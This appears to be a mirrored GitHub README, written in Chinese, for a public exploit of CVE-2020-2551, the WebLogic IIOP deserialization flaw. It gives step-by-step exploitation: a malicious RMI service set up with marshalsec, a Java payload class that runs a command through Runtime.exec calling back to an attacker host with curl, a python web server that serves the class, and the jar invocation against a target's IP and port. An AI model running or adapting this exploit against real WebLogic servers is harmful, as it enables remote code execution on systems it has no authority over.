CVE-2020-2551

Project Url: Y4er/CVE-2020-2551
Introduction: Weblogic IIOP CVE-2020-2551
More: Author   ReportBugs   
Tags:

Weblogic IIOP 反序列化

测试环境

Weblogic10.3.6+jdk1.6

打包好的 jar 包 提取码:a6ob

漏洞利用

下载 jar 包,然后使用 marshalsec 起一个恶意的 RMI 服务,本地编译一个 exp.java

package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

尽量使用和 weblogic 相同的 jdk 版本和依赖库(wlfullclient.jar)编译 然后本地起一个 web 服务器

python -m http.server --bind 0.0.0.0 80

命令行运行 jar 包

java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

实际效果如图 image

已知问题

很多小伙伴都说复现不成功,看了网上的一些文章发现 IIOP 存在 nat 模式的问题,今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。

参考

https://y4er.com/post/weblogic-cve-2020-2551/

Apps
About Me
GitHub: Trinea
Facebook: Dev Tools